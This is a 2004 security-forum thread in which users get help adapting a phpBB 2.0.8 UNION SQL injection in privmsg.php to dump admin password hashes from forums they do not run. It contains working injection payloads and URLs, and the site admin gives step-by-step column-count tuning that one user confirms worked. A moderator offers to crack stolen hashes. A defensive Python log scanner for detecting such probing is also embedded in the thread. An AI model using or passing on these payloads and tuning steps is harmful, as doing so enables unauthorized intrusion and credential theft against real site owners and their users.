IT Security and Insecurity Portal

phpBB 2.0.8 SQL injection

Posted: Wed Sep 08, 2004 9:00 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

Hello, I tried the phpBB 2.0.8 SQL injection exploit, which exposes the admin's or any other user's MD5 hash. But the thing is I can't get it to work on some phpBB forums. I get debug mode. This is the debug output I get (posted below). Is there any way I can modify the SQL injection a little bit so it works on other sites too? Thanks for any help.
*I replaced the real name with HOST
Code:
Could not query private message post information
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbbHOST_privmsgs pm, phpbbHOST_privmsgs_text pmt, phpbbHOST_users u, phpbbHOST_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 1087 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 1087 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 238
File : /home/fhlinux194/p/HOST.com/user/htdocs/phpBB2/privmsg.php

Posted: Wed Sep 08, 2004 9:06 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Well, the SQL error message is clear:
"SQL Error : 1222 The used SELECT statements have a different number of columns"
So you have to
1. count how many columns the original query contains
2. modify the UNION query according to the result.

Posted: Wed Sep 08, 2004 9:35 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

waraxe wrote:
    Well, the SQL error message is clear:
    "SQL Error : 1222 The used SELECT statements have a different number of columns"
    So you have to
    1. count how many columns the original query contains
    2. modify the UNION query according to the result.

Yes, that was my point actually. I'm sorry I made it unclear what my problem really is. I don't know how to count the columns in a phpBB forum. I don't suppose they mean the number of "threads" there are, like "C++", "Visual Basic" etc. And where exactly do I modify the number of columns? Do I change the number of "NULL"s to the number of columns present? And about the UNION, I guess that's automatically corrected after the columns are corrected, or am I wrong here too?

Posted: Thu Sep 09, 2004 11:10 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If we look at the original UNION query -
"UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users",
then we can count 31 columns.
For some reason that phpBB installation has a different number of columns
in the related table. Probably more than 31, but it can be less too. The SQL error message is not telling us "more" or "less", just "not equal".
So start with 29 or 30 columns and then move further - 31, 32, 33, etc.
If you no longer get this SQL error (#SQL 1222), then you have tweaked the column count in the UNION query. And next maybe you need to reposition the output columns - "username" and "user_password".
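The column-count walk waraxe describes (29, 30, 31, ... until error 1222 goes away) has a defensive mirror: every attempt lands in the web server's access log as a `pm_sql_user` value whose UNION SELECT list differs only in length. The Python below is an added example, not code from this thread or from phpBB; it extracts `pm_sql_user` from constructed common-log lines, counts the UNION columns (the payload quoted in the thread counts to 31), and flags clients that sent several different counts. The log format, IP addresses and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, quote, urlsplit

# Common-log request line: client IP, request target, HTTP status (log format is assumed).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# UNION [ALL] SELECT <column list> FROM: the list whose length must match the outer query.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)\s+from\b", re.I | re.S)

def union_column_count(sql_fragment):
    """Columns in the UNION SELECT list (fillers are 0/null or bare names), or None if absent."""
    m = UNION_RE.search(sql_fragment)
    return None if m is None else len([c for c in m.group(1).split(",") if c.strip()])

def scan_privmsg_unions(lines):
    """Map client IP -> set of UNION column counts seen in pm_sql_user on privmsg.php."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        ip, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("privmsg.php"):
            continue
        for value in parse_qs(url.query).get("pm_sql_user", []):  # parse_qs URL-decodes
            n = union_column_count(value)
            if n is not None:
                seen[ip].add(n)
    return dict(seen)

def probing_clients(lines, min_distinct=2):
    """Clients whose payloads used several column counts: the 29, 30, 31, ... walk from the thread."""
    return sorted(ip for ip, c in scan_privmsg_unions(lines).items() if len(c) >= min_distinct)

# The payload quoted in the thread: 20 fillers, username, 9 fillers, user_password = 31 columns.
PAGE_PAYLOAD = ("AND pm.privmsgs_type=-99 UNION SELECT " + "0," * 20 + "username,"
                + "0," * 9 + "user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*")

def _log_line(ip, payload):
    """Constructed sample log line carrying the payload URL-encoded in pm_sql_user."""
    return (f'{ip} - - [09/Sep/2004:11:10:00 +0000] "GET /phpBB2/privmsg.php?folder=inbox'
            f'&mode=read&p=99&pm_sql_user={quote(payload)} HTTP/1.1" 200 5120')

# Constructed sample log: 10.0.0.5 walks the column count, 192.0.2.8 just reads a message.
PROBE = "AND pm.privmsgs_type=-99 UNION SELECT {} FROM phpbb_users LIMIT 1/*"
SAMPLE_LOG = [_log_line("10.0.0.5", PROBE.format(",".join(["null"] * n))) for n in (29, 30, 31, 32)]
SAMPLE_LOG.append('192.0.2.8 - - [09/Sep/2004:11:11:00 +0000] '
                  '"GET /phpBB2/privmsg.php?folder=inbox&mode=read&p=99 HTTP/1.1" 200 4096')
```

Running `probing_clients(SAMPLE_LOG)` over the constructed log returns only `10.0.0.5`, the client whose requests carried four different column counts; the normal reader is not flagged.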

Posted: Thu Sep 09, 2004 1:30 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

Thanks waraxe, I can't thank you enough. Thanks to you I got it to work.

Posted: Thu Sep 09, 2004 2:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

I'm happy to help!

Posted: Wed Nov 17, 2004 9:43 am
Wang
Regular user
Joined: Oct 30, 2004
Posts: 5

privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%10pm.privmsgs_type=-99%10UNION%10SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%A0GET%A0phpbb_users%A0POST%A0user_level=1%A0LIMIT%A05/*
That string doesn't work. How do I hack a phpBB 2.0.8 forum?

Posted: Wed Dec 01, 2004 2:05 am
ToXiC
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

Try MD5 hash tables... or just PM me the hash, I will try to crack it.

Posted: Tue Dec 14, 2004 6:03 pm
katz
Beginner
Joined: Oct 09, 2004
Posts: 2

I'm sorry if this is inappropriate, but on version 2.0.6 I got an error.
Quote:
Could not query private message post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null' at line 5
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM forums_privmsgs pm, forums_privmsgs_text pmt, forums_users u, forums_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 92 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 92 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /var/www/forums/privmsg.php

Do I have to change anything in the URL from the original statement in http://waraxe.us/?modname=sa&id=013?